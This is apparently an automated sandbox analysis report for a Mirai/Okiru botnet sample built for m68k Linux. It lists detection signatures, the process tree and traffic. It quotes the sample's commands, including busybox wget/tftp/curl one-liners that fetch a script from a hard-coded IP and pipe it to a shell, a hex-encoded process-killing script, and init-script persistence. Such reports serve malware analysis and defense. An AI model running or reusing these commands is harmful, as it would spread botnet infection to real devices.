Edit tour

Linux Analysis Report
m68k.nn.elf

Overview

General Information

Sample name:	m68k.nn.elf
Analysis ID:	1561678
MD5:	759a1312ba421c777a634fce61723fb6
SHA1:	b4db9fe0f55f3f544244d0f501b9b16e8ac56cab
SHA256:	4f5a17ee5195066461ba2eef56ed5a59a168ef57b479bbc068809ddba35cc35a
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561678
Start date and time:	2024-11-24 04:17:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	m68k.nn.elf
Detection:	MAL
Classification:	mal80.spre.troj.evad.linELF@0/11@0/0

Runtime Messages

Command:	/tmp/m68k.nn.elf
PID:	6232
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

m68k.nn.elf (PID: 6232, Parent: 6158, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.nn.elf

m68k.nn.elf New Fork (PID: 6249, Parent: 6232)

m68k.nn.elf New Fork (PID: 6271, Parent: 6232)

sh (PID: 6271, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6276, Parent: 6271)

systemctl (PID: 6276, Parent: 6271, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

m68k.nn.elf New Fork (PID: 6314, Parent: 6232)

sh (PID: 6314, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6316, Parent: 6314)

chmod (PID: 6316, Parent: 6314, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

m68k.nn.elf New Fork (PID: 6317, Parent: 6232)

sh (PID: 6317, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6328, Parent: 6317)

ln (PID: 6328, Parent: 6317, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

m68k.nn.elf New Fork (PID: 6330, Parent: 6232)

sh (PID: 6330, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"

m68k.nn.elf New Fork (PID: 6336, Parent: 6232)

sh (PID: 6336, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6338, Parent: 6336)

chmod (PID: 6338, Parent: 6336, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/m68k.nn.elf

m68k.nn.elf New Fork (PID: 6339, Parent: 6232)

sh (PID: 6339, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6344, Parent: 6339)

mkdir (PID: 6344, Parent: 6339, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

m68k.nn.elf New Fork (PID: 6345, Parent: 6232)

sh (PID: 6345, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6350, Parent: 6345)

ln (PID: 6350, Parent: 6345, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf

m68k.nn.elf New Fork (PID: 6351, Parent: 6232)

udisksd New Fork (PID: 6244, Parent: 799)

dumpe2fs (PID: 6244, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6278, Parent: 799)

dumpe2fs (PID: 6278, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6286, Parent: 6285)

snapd-env-generator (PID: 6286, Parent: 6285, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

gnome-session-binary New Fork (PID: 6293, Parent: 1477)

sh (PID: 6293, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

gsd-housekeeping (PID: 6293, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping

gdm3 New Fork (PID: 6319, Parent: 1320)

Default (PID: 6319, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 6329, Parent: 1320)

Default (PID: 6329, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

udisksd New Fork (PID: 6359, Parent: 799)

dumpe2fs (PID: 6359, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6408, Parent: 799)

dumpe2fs (PID: 6408, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6409, Parent: 799)

dumpe2fs (PID: 6409, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
m68k.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
m68k.nn.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
6232.1.00007f9948001000.00007f994801e000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6232.1.00007f9948001000.00007f994801e000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6249.1.00007f9948001000.00007f994801e000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6249.1.00007f9948001000.00007f994801e000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: m68k.nn.elf PID: 6232	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: m68k.nn.elf PID: 6249	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 1 entries

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: m68k.nn.elf

ReversingLabs: Detection: 34%

Source: m68k.nn.elf	String: (deleted)/proc/self/exe/proc/%s/exe/proc/opendirsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/login193.143.1.70malloc[start_pid_hopping] Failed to clone: %s
Source: m68k.nn.elf	String: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- \| sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- \| shGET /dlr. HTTP/1.0

Source: global traffic

TCP traffic: 192.168.2.23:38978 -> 154.216.19.139:199

Source: /tmp/m68k.nn.elf (PID: 6232)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43

Source: m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, m68k.nn.elf.42.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://193.143.1.70/
Source: m68k.nn.elf	String found in binary or memory: http://193.143.1.70/curl.sh
Source: m68k.nn.elf	String found in binary or memory: http://193.143.1.70/lol.sh
Source: m68k.nn.elf	String found in binary or memory: http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: (deleted)/proc/self/exe/proc/%s/exe/proc/opendirsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesn
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://193.143.1.70/lol.sh -O- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- \| sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/m68k.nn.elf (PID: 6249)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6249)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6249)	SIGKILL sent: pid: 1664, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6249)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6249)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6249)	SIGKILL sent: pid: 6293, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6249)	SIGKILL sent: pid: 6301, result: successful	Jump to behavior

Source: classification engine

Classification label: mal80.spre.troj.evad.linELF@0/11@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/m68k.nn.elf (PID: 6232)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/m68k.nn.elf (PID: 6232)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6328)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6350)	File: /etc/rc.d/S99m68k.nn.elf -> /etc/init.d/m68k.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/m68k.nn.elf (PID: 6232)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6316)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6338)	File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 6271)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6314)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6317)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6330)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6336)	Shell command executed: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6339)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6345)	Shell command executed: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6316)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6338)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/m68k.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6344)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 6276)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 6232)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6316)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6338)	File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 6232)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/m68k.nn.elf (PID: 6232)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6330)	Writes shell script file to disk with an unusual file extension: /etc/init.d/m68k.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/m68k.nn.elf (PID: 6232)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6330)	File: /etc/init.d/m68k.nn.elf			Jump to dropped file

Source: /tmp/m68k.nn.elf (PID: 6232)

Queries kernel information via 'uname':

Jump to behavior

Source: m68k.nn.elf, 6232.1.00007ffd84462000.00007ffd84483000.rw-.sdmp, m68k.nn.elf, 6249.1.00007ffd84462000.00007ffd84483000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.nn.elf
Source: m68k.nn.elf, 6249.1.000055b200dcd000.000055b200e52000.rw-.sdmp	Binary or memory string: U1!/usr/bin/vmtoolsd
Source: m68k.nn.elf, 6232.1.000055b200dcd000.000055b200e52000.rw-.sdmp, m68k.nn.elf, 6249.1.000055b200dcd000.000055b200e52000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k/usQ
Source: m68k.nn.elf, 6232.1.00007ffd84462000.00007ffd84483000.rw-.sdmp, m68k.nn.elf, 6249.1.00007ffd84462000.00007ffd84483000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: m68k.nn.elf, 6232.1.000055b200dcd000.000055b200e52000.rw-.sdmp, m68k.nn.elf, 6249.1.000055b200dcd000.000055b200e52000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/m68k
Source: m68k.nn.elf, 6249.1.00007f9948020000.00007f9948024000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: m68k.nn.elf, 6232.1.000055b200dcd000.000055b200e52000.rw-.sdmp, m68k.nn.elf, 6249.1.000055b200dcd000.000055b200e52000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k/usQ`
Source: m68k.nn.elf, 6232.1.00007ffd84462000.00007ffd84483000.rw-.sdmp, m68k.nn.elf, 6249.1.00007ffd84462000.00007ffd84483000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: m68k.nn.elf, 6232.1.000055b200dcd000.000055b200e52000.rw-.sdmp, m68k.nn.elf, 6249.1.000055b200dcd000.000055b200e52000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k
Source: m68k.nn.elf, 6232.1.00007ffd84462000.00007ffd84483000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.bKy4Gs-m~
Source: m68k.nn.elf, 6232.1.00007ffd84462000.00007ffd84483000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: m68k.nn.elf, 6232.1.00007ffd84462000.00007ffd84483000.rw-.sdmp, m68k.nn.elf, 6249.1.00007ffd84462000.00007ffd84483000.rw-.sdmp	Binary or memory string: panel/wrapper-2./qemu-open.XXXXX
Source: m68k.nn.elf, 6232.1.00007ffd84462000.00007ffd84483000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.bKy4Gs

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6249.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6249.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6249, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6249.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6232.1.00007f9948001000.00007f994801e000.r-x.sdmp, type: MEMORY
